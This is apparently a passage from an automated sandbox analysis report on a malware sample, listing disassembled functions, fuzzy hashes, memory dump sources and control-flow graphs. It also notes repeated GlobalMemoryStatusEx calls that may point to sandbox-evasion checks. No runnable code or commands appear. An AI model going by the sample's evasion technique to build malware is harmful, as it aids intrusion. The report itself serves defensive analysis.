                                                              • Instruction Fuzzy Hash: C401F775804384ABF7144AA9CC80B67BFD8EF90620F54C42BED080E6A3C2389840CAB2
                                                              Function 014AD730 Relevance: .0, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1528788401.00000000014AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014AD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_14ad000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e0f50a6c2ac00a906e758f6dbbd5765d8ccc0b125ebf8fd0e390e4c52669c6e9
                                                              • Instruction ID: f8080472342303a2375293cc2e11db1fb5c130d94edc518ef28d3bcb2cca1e4b
                                                              • Opcode Fuzzy Hash: e0f50a6c2ac00a906e758f6dbbd5765d8ccc0b125ebf8fd0e390e4c52669c6e9
                                                              • Instruction Fuzzy Hash: 30F0CD36404384AFE7248A1ACC84B67FFD8EB90734F18C55AED080E293C2799840CAB1

                                                              Non-executed Functions

                                                              Function 0794BD08 Relevance: .4, Instructions: 351COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e118dd5498cd1fda85f72b3f9a4eab6f7b6902d26929eecde8dcc3021b865bc3
                                                              • Instruction ID: ceba114afe231665e01f271b74a9896525a9c6291d1c66078a9e99bfe21c5434
                                                              • Opcode Fuzzy Hash: e118dd5498cd1fda85f72b3f9a4eab6f7b6902d26929eecde8dcc3021b865bc3
                                                              • Instruction Fuzzy Hash: 57D19DB1B017068FEB29EB75C850BAEB7FAAFC9708F14446DD1469B290CB35E901CB51
                                                              Function 07944730 Relevance: .3, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 46ca25a83b438bb3adbd51e6937af354dbe285028e7e9e9b20ec89e4dfc32d2e
                                                              • Instruction ID: f9b52f4be86b35c91106b8a64d19f85b5c55ce3d214aef025f36d42599e65a71
                                                              • Opcode Fuzzy Hash: 46ca25a83b438bb3adbd51e6937af354dbe285028e7e9e9b20ec89e4dfc32d2e
                                                              • Instruction Fuzzy Hash: 39E1E6B4E002598FDB14DFA9C580AAEFBB6FF89305F248169D814AB355D731AD41CFA0
                                                              Function 07945F70 Relevance: .3, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: be02da22710e761d7ee9463e286c5e16a95bd79728bf23fe8318277ca80e9bad
                                                              • Instruction ID: 4ec5b6eab3b4f45be080293fdf067482a2e8ccc0d0e5dad1c31d91669f0dc39e
                                                              • Opcode Fuzzy Hash: be02da22710e761d7ee9463e286c5e16a95bd79728bf23fe8318277ca80e9bad
                                                              • Instruction Fuzzy Hash: 34E1F8B4E002198FDB14DFA9C580AAEBBB6FF8A305F248169D814AB355D731AD41CF61
                                                              Function 07943EC0 Relevance: .3, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 19d4314f4b83005cf606eeee6294e18a20fa4fb5fe4c82889bedf72e898ac8a7
                                                              • Instruction ID: f05168358a5b68c51450cfa28ec0f173d38c5fb3acdc6fef94bb1b2b35ab5412
                                                              • Opcode Fuzzy Hash: 19d4314f4b83005cf606eeee6294e18a20fa4fb5fe4c82889bedf72e898ac8a7
                                                              • Instruction Fuzzy Hash: B8E115B4E002598FDB14DFA8C580AAEFBB6FF89305F248169D814AB355D731AD41CFA0
                                                              Function 07945B38 Relevance: .3, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a4517e133802b689a5bd4b4fb5521f9a679a6a09717e0b7553b5a18332e1797f
                                                              • Instruction ID: 50f3d4179e25d456d55c0ca61a8f8721e34a753ef2358c2a8ddf9b8f4e7189d4
                                                              • Opcode Fuzzy Hash: a4517e133802b689a5bd4b4fb5521f9a679a6a09717e0b7553b5a18332e1797f
                                                              • Instruction Fuzzy Hash: DEE1F8B4E002198FDB14DFA9C584AAEBBF6FF89305F248169D814AB355D730AD41CFA1
                                                              Function 079442F8 Relevance: .3, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6dab69d5354813f022fd8ea1ef3de6db61f2acf5e7a6da2c9c4a5a64798c1a0e
                                                              • Instruction ID: 6f78e978ae449636fed10a831cc764ec23b440be126f18684213e050baa47c75
                                                              • Opcode Fuzzy Hash: 6dab69d5354813f022fd8ea1ef3de6db61f2acf5e7a6da2c9c4a5a64798c1a0e
                                                              • Instruction Fuzzy Hash: 93E1E5B4E002598FDB14DFA9C580AAEBBF6FF89305F248169D814AB355D731AD41CFA0
                                                              Function 0150DF14 Relevance: .3, Instructions: 264COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1532085952.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1500000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b588cbb4b18490353b16a24c6c806ccda8819c8731341a2e767e68fcb0605aa7
                                                              • Instruction ID: c538caaedc01fce51027af65a812a3958490572a7342bb8b9d1ba2b16ec03fa6
                                                              • Opcode Fuzzy Hash: b588cbb4b18490353b16a24c6c806ccda8819c8731341a2e767e68fcb0605aa7
                                                              • Instruction Fuzzy Hash: 82A16F32E0020A8FCF16DFF5C84059EBBB6FF84300B15856AE915AF2A5DB75D945CB80

                                                              Execution Graph

                                                              Execution Coverage:12.9%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:19
                                                              Total number of Limit Nodes:4
                                                              execution_graph 27265 1260848 27266 126084e 27265->27266 27267 126091b 27266->27267 27269 1261382 27266->27269 27270 126138a 27269->27270 27271 1261484 27270->27271 27273 1267ea8 27270->27273 27271->27266 27274 1267eb2 27273->27274 27275 1267ecc 27274->27275 27278 6aed9e0 27274->27278 27283 6aed9f0 27274->27283 27275->27270 27280 6aeda05 27278->27280 27279 6aedc1a 27279->27275 27280->27279 27281 6aede88 GlobalMemoryStatusEx 27280->27281 27282 6aedc31 GlobalMemoryStatusEx 27280->27282 27281->27280 27282->27280 27285 6aeda05 27283->27285 27284 6aedc1a 27284->27275 27285->27284 27286 6aede88 GlobalMemoryStatusEx 27285->27286 27287 6aedc31 GlobalMemoryStatusEx 27285->27287 27286->27285 27287->27285

                                                              Executed Functions

                                                              Function 0126A968 Relevance: 2.8, Instructions: 2805COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0f77d9a3f9c677abf48b0814174ffd706f0eef3e0a96d2670eb8aaed08568cec
                                                              • Instruction ID: 150620d201c9b57916f3fccf774f2211e253427a1502c7a4dbdd969f53cc4aba
                                                              • Opcode Fuzzy Hash: 0f77d9a3f9c677abf48b0814174ffd706f0eef3e0a96d2670eb8aaed08568cec
                                                              • Instruction Fuzzy Hash: E7531831D10B5A8ACB51EF68C8846A9F7B1FF99300F50D79AE44877121FB70AAD5CB81
                                                              Function 01264A98 Relevance: .3, Instructions: 266COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 10dfe8b13f79145242b00909be505707e8f2fc9dafd43fff4d8319d1324e7de6
                                                              • Instruction ID: 5d1de84bd74ec67ad4e419e398c59c9e6fd6937799232023e56db5e20993f85b
                                                              • Opcode Fuzzy Hash: 10dfe8b13f79145242b00909be505707e8f2fc9dafd43fff4d8319d1324e7de6
                                                              • Instruction Fuzzy Hash: C9B18070E1024ACFDB10DFA9C88179DBBF6AF98314F148129D954E7394EB759885CB81
                                                              Function 01263E80 Relevance: .2, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b1fe08f1cee4d3f636f1d4774e5714d5f1d6f261cdb306f473acd19f74be9e92
                                                              • Instruction ID: b0e33e847003a64f6af2c1e5163b34acf6539d6643467acfdbc8f31fc517dc94
                                                              • Opcode Fuzzy Hash: b1fe08f1cee4d3f636f1d4774e5714d5f1d6f261cdb306f473acd19f74be9e92
                                                              • Instruction Fuzzy Hash: 1E919C70E1024ACFDF14DFA9C8817DEBBF6BF88304F148129E559A7294EB749885CB81
                                                              Function 06AEE950 Relevance: 1.6, APIs: 1, Instructions: 125COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 460 6aee950-6aee96b 461 6aee96d-6aee994 call 6aed1d0 460->461 462 6aee995-6aee9b4 call 6aee550 460->462 468 6aee9ba-6aeea19 462->468 469 6aee9b6-6aee9b9 462->469 475 6aeea1f-6aeeaac GlobalMemoryStatusEx 468->475 476 6aeea1b-6aeea1e 468->476 479 6aeeaae-6aeeab4 475->479 480 6aeeab5-6aeeadd 475->480 479->480
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3959512169.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_6ae0000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 746868802e7a51ac8f1379b5e89fd2de187e0ea3fd7029fcf4dbb4d0d410e590
                                                              • Instruction ID: 2f40618752c4ceffde47b7d8f2521fe85bd22a2da05af1ff0101da141c1cf25a
                                                              • Opcode Fuzzy Hash: 746868802e7a51ac8f1379b5e89fd2de187e0ea3fd7029fcf4dbb4d0d410e590
                                                              • Instruction Fuzzy Hash: D4412472D047858FDB04DF75D40439EBBF1BF89310F15856AD508AB381EB789889CBA1
                                                              Function 06AEEA38 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 483 6aeea38-6aeea76 484 6aeea7e-6aeeaac GlobalMemoryStatusEx 483->484 485 6aeeaae-6aeeab4 484->485 486 6aeeab5-6aeeadd 484->486 485->486
                                                              APIs
                                                              • GlobalMemoryStatusEx.KERNEL32 ref: 06AEEA9F
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3959512169.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_6ae0000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: GlobalMemoryStatus
                                                              • String ID:
                                                              • API String ID: 1890195054-0
                                                              • Opcode ID: 76d52f090a8f46445375236aec8471d434019a26b0585e1d7bb9d000af42a053
                                                              • Instruction ID: 9b4c27d68b85d9fc3d19bd7d05d953e9367813b73bcbf62496a8fbf9fb151931
                                                              • Opcode Fuzzy Hash: 76d52f090a8f46445375236aec8471d434019a26b0585e1d7bb9d000af42a053
                                                              • Instruction Fuzzy Hash: 7111F0B1C006599BDB10DFAAC844BDEFBF4BF48320F15816AD918A7240D778A944CFA5
                                                              Function 012686C8 Relevance: .6, Instructions: 564COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2230 12686c8-12686da 2232 12686bf 2230->2232 2233 12686dc 2230->2233 2234 12686de-12686ff 2233->2234 2235 126873c 2233->2235 2252 1268739 2234->2252 2236 126873e-1268764 2235->2236 2237 1268769-126876c 2235->2237 2236->2237 2239 126876e-1268794 2237->2239 2240 1268799-126879c 2237->2240 2239->2240 2241 126879e-12687c4 2240->2241 2242 12687c9-12687cc 2240->2242 2241->2242 2244 12687ce-12687f4 2242->2244 2245 12687f9-12687fc 2242->2245 2244->2245 2248 12687fe-1268824 2245->2248 2249 1268829-126882c 2245->2249 2248->2249 2254 126882e-1268854 2249->2254 2255 1268859-126885c 2249->2255 2252->2235 2254->2255 2257 126885e-1268884 2255->2257 2258 1268889-126888c 2255->2258 2257->2258 2264 126888e-12688b4 2258->2264 2265 12688b9-12688bc 2258->2265 2264->2265 2267 12688be-12688c0 2265->2267 2268 12688cd-12688d0 2265->2268 2451 12688c2 call 126a01b 2267->2451 2452 12688c2 call 1269f68 2267->2452 2453 12688c2 call 1269f78 2267->2453 2274 12688d2-12688f8 2268->2274 2275 12688fd-1268900 2268->2275 2274->2275 2277 1268902-1268928 2275->2277 2278 126892d-1268930 2275->2278 2277->2278 2284 1268932-1268958 2278->2284 2285 126895d-1268960 2278->2285 2279 12688c8 2279->2268 2284->2285 2287 1268962-1268988 2285->2287 2288 126898d-1268990 2285->2288 2287->2288 2292 1268992-12689b8 2288->2292 2293 12689bd-12689c0 2288->2293 2292->2293 2296 12689c2-12689e8 2293->2296 2297 12689ed-12689f0 2293->2297 2296->2297 2300 12689f2-1268a18 2297->2300 2301 1268a1d-1268a20 2297->2301 2300->2301 2305 1268a22-1268a48 2301->2305 2306 1268a4d-1268a50 2301->2306 2305->2306 2310 1268a52-1268a78 2306->2310 2311 1268a7d-1268a80 2306->2311 2310->2311 2315 1268a82-1268aa8 2311->2315 2316 1268aad-1268ab0 2311->2316 2315->2316 2320 1268ab2-1268ad8 2316->2320 2321 1268add-1268ae0 2316->2321 2320->2321 2325 1268ae2-1268b08 2321->2325 2326 1268b0d-1268b10 2321->2326 2325->2326 2330 1268b12-1268b38 2326->2330 2331 1268b3d-1268b40 2326->2331 2330->2331 2335 1268b42-1268b68 2331->2335 2336 1268b6d-1268b70 2331->2336 2335->2336 2340 1268b72-1268b98 2336->2340 2341 1268b9d-1268ba0 2336->2341 2340->2341 2345 1268ba2-1268bc8 2341->2345 2346 1268bcd-1268bd0 2341->2346 2345->2346 2350 1268bd2-1268be8 2346->2350 2351 1268bed-1268bf0 2346->2351 2350->2351 2358 1268bf2-1268c18 2351->2358 2359 1268c1d-1268c20 2351->2359 2358->2359 2360 1268c22-1268c48 2359->2360 2361 1268c4d-1268c50 2359->2361 2360->2361 2368 1268c52-1268c5e 2361->2368 2369 1268c6b-1268c6e 2361->2369 2384 1268c66 2368->2384 2370 1268c70-1268c96 2369->2370 2371 1268c9b-1268c9e 2369->2371 2370->2371 2378 1268ca0-1268cc6 2371->2378 2379 1268ccb-1268cce 2371->2379 2378->2379 2380 1268cd0-1268cf6 2379->2380 2381 1268cfb-1268cfe 2379->2381 2380->2381 2386 1268d00-1268d26 2381->2386 2387 1268d2b-1268d2e 2381->2387 2384->2369 2386->2387 2389 1268d30-1268d56 2387->2389 2390 1268d5b-1268d5e 2387->2390 2389->2390 2395 1268d60-1268d86 2390->2395 2396 1268d8b-1268d8e 2390->2396 2395->2396 2398 1268d90-1268db6 2396->2398 2399 1268dbb-1268dbe 2396->2399 2398->2399 2405 1268dc0-1268de6 2399->2405 2406 1268deb-1268dee 2399->2406 2405->2406 2408 1268df0-1268e16 2406->2408 2409 1268e1b-1268e1e 2406->2409 2408->2409 2415 1268e20 2409->2415 2416 1268e2b-1268e2e 2409->2416 2427 1268e26 2415->2427 2418 1268e30-1268e56 2416->2418 2419 1268e5b-1268e5e 2416->2419 2418->2419 2425 1268e60-1268e86 2419->2425 2426 1268e8b-1268e8e 2419->2426 2425->2426 2428 1268e90-1268eb6 2426->2428 2429 1268ebb-1268ebe 2426->2429 2427->2416 2428->2429 2434 1268ec0-1268ee6 2429->2434 2435 1268eeb-1268eed 2429->2435 2434->2435 2437 1268ef4-1268ef7 2435->2437 2438 1268eef 2435->2438 2437->2252 2442 1268efd-1268f03 2437->2442 2438->2437 2451->2279 2452->2279 2453->2279
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4365fbf122b4b69002e81e0a51c1ea38e14075c41eb6962dcd9d0b1ad5392a29
                                                              • Instruction ID: 0b6f9d88ecdf2ff3a87f21b95c935393bfeec6b0348244d3ae19614bc365d005
                                                              • Opcode Fuzzy Hash: 4365fbf122b4b69002e81e0a51c1ea38e14075c41eb6962dcd9d0b1ad5392a29
                                                              • Instruction Fuzzy Hash: 65226D30B012069BDB26AB7CE4946AC33A6FBC9651B104E3DE205CB795DF71EC96C781
                                                              Function 01268720 Relevance: .6, Instructions: 556COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2454 1268720-1268737 2455 1268739-126873c 2454->2455 2457 126873e-1268764 2455->2457 2458 1268769-126876c 2455->2458 2457->2458 2459 126876e-1268794 2458->2459 2460 1268799-126879c 2458->2460 2459->2460 2461 126879e-12687c4 2460->2461 2462 12687c9-12687cc 2460->2462 2461->2462 2464 12687ce-12687f4 2462->2464 2465 12687f9-12687fc 2462->2465 2464->2465 2467 12687fe-1268824 2465->2467 2468 1268829-126882c 2465->2468 2467->2468 2472 126882e-1268854 2468->2472 2473 1268859-126885c 2468->2473 2472->2473 2475 126885e-1268884 2473->2475 2476 1268889-126888c 2473->2476 2475->2476 2482 126888e-12688b4 2476->2482 2483 12688b9-12688bc 2476->2483 2482->2483 2485 12688be-12688c0 2483->2485 2486 12688cd-12688d0 2483->2486 2669 12688c2 call 126a01b 2485->2669 2670 12688c2 call 1269f68 2485->2670 2671 12688c2 call 1269f78 2485->2671 2492 12688d2-12688f8 2486->2492 2493 12688fd-1268900 2486->2493 2492->2493 2495 1268902-1268928 2493->2495 2496 126892d-1268930 2493->2496 2495->2496 2502 1268932-1268958 2496->2502 2503 126895d-1268960 2496->2503 2497 12688c8 2497->2486 2502->2503 2505 1268962-1268988 2503->2505 2506 126898d-1268990 2503->2506 2505->2506 2510 1268992-12689b8 2506->2510 2511 12689bd-12689c0 2506->2511 2510->2511 2514 12689c2-12689e8 2511->2514 2515 12689ed-12689f0 2511->2515 2514->2515 2518 12689f2-1268a18 2515->2518 2519 1268a1d-1268a20 2515->2519 2518->2519 2523 1268a22-1268a48 2519->2523 2524 1268a4d-1268a50 2519->2524 2523->2524 2528 1268a52-1268a78 2524->2528 2529 1268a7d-1268a80 2524->2529 2528->2529 2533 1268a82-1268aa8 2529->2533 2534 1268aad-1268ab0 2529->2534 2533->2534 2538 1268ab2-1268ad8 2534->2538 2539 1268add-1268ae0 2534->2539 2538->2539 2543 1268ae2-1268b08 2539->2543 2544 1268b0d-1268b10 2539->2544 2543->2544 2548 1268b12-1268b38 2544->2548 2549 1268b3d-1268b40 2544->2549 2548->2549 2553 1268b42-1268b68 2549->2553 2554 1268b6d-1268b70 2549->2554 2553->2554 2558 1268b72-1268b98 2554->2558 2559 1268b9d-1268ba0 2554->2559 2558->2559 2563 1268ba2-1268bc8 2559->2563 2564 1268bcd-1268bd0 2559->2564 2563->2564 2568 1268bd2-1268be8 2564->2568 2569 1268bed-1268bf0 2564->2569 2568->2569 2576 1268bf2-1268c18 2569->2576 2577 1268c1d-1268c20 2569->2577 2576->2577 2578 1268c22-1268c48 2577->2578 2579 1268c4d-1268c50 2577->2579 2578->2579 2586 1268c52-1268c5e 2579->2586 2587 1268c6b-1268c6e 2579->2587 2602 1268c66 2586->2602 2588 1268c70-1268c96 2587->2588 2589 1268c9b-1268c9e 2587->2589 2588->2589 2596 1268ca0-1268cc6 2589->2596 2597 1268ccb-1268cce 2589->2597 2596->2597 2598 1268cd0-1268cf6 2597->2598 2599 1268cfb-1268cfe 2597->2599 2598->2599 2604 1268d00-1268d26 2599->2604 2605 1268d2b-1268d2e 2599->2605 2602->2587 2604->2605 2607 1268d30-1268d56 2605->2607 2608 1268d5b-1268d5e 2605->2608 2607->2608 2613 1268d60-1268d86 2608->2613 2614 1268d8b-1268d8e 2608->2614 2613->2614 2616 1268d90-1268db6 2614->2616 2617 1268dbb-1268dbe 2614->2617 2616->2617 2623 1268dc0-1268de6 2617->2623 2624 1268deb-1268dee 2617->2624 2623->2624 2626 1268df0-1268e16 2624->2626 2627 1268e1b-1268e1e 2624->2627 2626->2627 2633 1268e20 2627->2633 2634 1268e2b-1268e2e 2627->2634 2645 1268e26 2633->2645 2636 1268e30-1268e56 2634->2636 2637 1268e5b-1268e5e 2634->2637 2636->2637 2643 1268e60-1268e86 2637->2643 2644 1268e8b-1268e8e 2637->2644 2643->2644 2646 1268e90-1268eb6 2644->2646 2647 1268ebb-1268ebe 2644->2647 2645->2634 2646->2647 2652 1268ec0-1268ee6 2647->2652 2653 1268eeb-1268eed 2647->2653 2652->2653 2655 1268ef4-1268ef7 2653->2655 2656 1268eef 2653->2656 2655->2455 2660 1268efd-1268f03 2655->2660 2656->2655 2669->2497 2670->2497 2671->2497
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c5e3141a2d46677982b440f7f4f0dcb9b5d6a935496030f5dc46f3740121c9a4
                                                              • Instruction ID: 13003609e96e3b3a303b63afeb67603f065725a2bc16ae9a981cb55f4ccc2f09
                                                              • Opcode Fuzzy Hash: c5e3141a2d46677982b440f7f4f0dcb9b5d6a935496030f5dc46f3740121c9a4
                                                              • Instruction Fuzzy Hash: 65125E30B012079BDB26AA7CE4946AC33A6FBC9651B144E3DE205CB785DF71EC96C781
                                                              Function 0126A182 Relevance: .4, Instructions: 417COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2815 126a182-126a18c 2816 126a1b0 2815->2816 2817 126a18e-126a1af 2815->2817 2818 126a1b1-126a1b4 2816->2818 2817->2816 2819 126a1b6-126a1c2 2818->2819 2820 126a1c7-126a1ca 2818->2820 2819->2820 2821 126a1ff-126a202 2820->2821 2822 126a1cc-126a1fa 2820->2822 2823 126a4c6-126a4cf 2821->2823 2824 126a208-126a20b 2821->2824 2822->2821 2826 126a4d5-126a4df 2823->2826 2827 126a20d-126a216 2823->2827 2824->2827 2828 126a228-126a22b 2824->2828 2830 126a4e2-126a512 2827->2830 2831 126a21c-126a223 2827->2831 2832 126a235-126a238 2828->2832 2833 126a22d-126a232 2828->2833 2842 126a514-126a517 2830->2842 2831->2828 2834 126a23a-126a256 2832->2834 2835 126a25b-126a25e 2832->2835 2833->2832 2834->2835 2838 126a260-126a26f 2835->2838 2839 126a27a-126a27c 2835->2839 2848 126a275 2838->2848 2849 126a4c3 2838->2849 2840 126a283-126a286 2839->2840 2841 126a27e 2839->2841 2840->2818 2844 126a28c-126a29a 2840->2844 2841->2840 2845 126a566-126a56f 2842->2845 2846 126a519-126a51c 2842->2846 2955 126a29d call 126a6c5 2844->2955 2956 126a29d call 126a6c8 2844->2956 2850 126a575 2845->2850 2851 126a5fd-126a606 2845->2851 2852 126a51e-126a537 2846->2852 2853 126a53c-126a53f 2846->2853 2848->2839 2849->2823 2855 126a57a-126a57d 2850->2855 2857 126a60c-126a610 2851->2857 2858 126a6ab-126a6c0 2851->2858 2852->2853 2859 126a561-126a564 2853->2859 2860 126a541-126a55c 2853->2860 2861 126a57f-126a58d 2855->2861 2862 126a598-126a59b 2855->2862 2864 126a615-126a618 2857->2864 2859->2845 2859->2855 2860->2859 2873 126a63c-126a65e 2861->2873 2884 126a593 2861->2884 2867 126a5ad-126a5b0 2862->2867 2868 126a59d 2862->2868 2869 126a637-126a63a 2864->2869 2870 126a61a-126a632 2864->2870 2866 126a2a3-126a2bf call 126de6a 2866->2849 2897 126a2c5-126a2ca 2866->2897 2877 126a5d5-126a5d8 2867->2877 2878 126a5b2-126a5ca 2867->2878 2885 126a5a5-126a5a8 2868->2885 2872 126a65f-126a662 2869->2872 2869->2873 2870->2869 2882 126a664-126a667 2872->2882 2883 126a66c-126a66f 2872->2883 2880 126a5e2-126a5e5 2877->2880 2881 126a5da-126a5dd 2877->2881 2878->2882 2894 126a5d0 2878->2894 2889 126a5e7-126a5ec 2880->2889 2890 126a5ef-126a5f2 2880->2890 2881->2880 2882->2883 2891 126a671-126a677 2883->2891 2892 126a68e-126a690 2883->2892 2884->2862 2885->2867 2889->2890 2895 126a6a0-126a6aa 2890->2895 2896 126a5f8-126a5fb 2890->2896 2902 126a67e-126a689 2891->2902 2898 126a697-126a69a 2892->2898 2899 126a692 2892->2899 2894->2877 2896->2851 2896->2864 2903 126a2d2-126a2d3 2897->2903 2898->2842 2898->2895 2899->2898 2902->2892 2903->2849 2905 126a2d9-126a336 2903->2905 2911 126a407-126a421 2905->2911 2912 126a33c-126a38f 2905->2912 2917 126a423-126a425 2911->2917 2930 126a391-126a3ad 2912->2930 2931 126a3af-126a3d2 call 12679d4 2912->2931 2919 126a427-126a431 2917->2919 2920 126a433 2917->2920 2921 126a438-126a43a 2919->2921 2920->2921 2923 126a43c-126a440 2921->2923 2924 126a4ab-126a4bd 2921->2924 2925 126a442-126a44f 2923->2925 2926 126a451 2923->2926 2924->2849 2924->2905 2928 126a456-126a458 2925->2928 2926->2928 2928->2924 2932 126a45a-126a45c 2928->2932 2944 126a3d4-126a405 2930->2944 2931->2944 2932->2924 2933 126a45e-126a4a4 2932->2933 2933->2924 2944->2917 2955->2866 2956->2866
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 978dcb6f15727d63279a48a8f21562d7831e17751062a483ea03d6144a123d3b
                                                              • Instruction ID: fde7e6b468df2da5b8d48f4ff3b7026bb7ac96068c0b9d4e633e41e2eb7d448e
                                                              • Opcode Fuzzy Hash: 978dcb6f15727d63279a48a8f21562d7831e17751062a483ea03d6144a123d3b
                                                              • Instruction Fuzzy Hash: 2DE19434B1020A8FDF15DB68D8946ADBBB6FF88310F244529E606E7391DB35DD82CB91
                                                              Function 01264A8E Relevance: .3, Instructions: 260COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
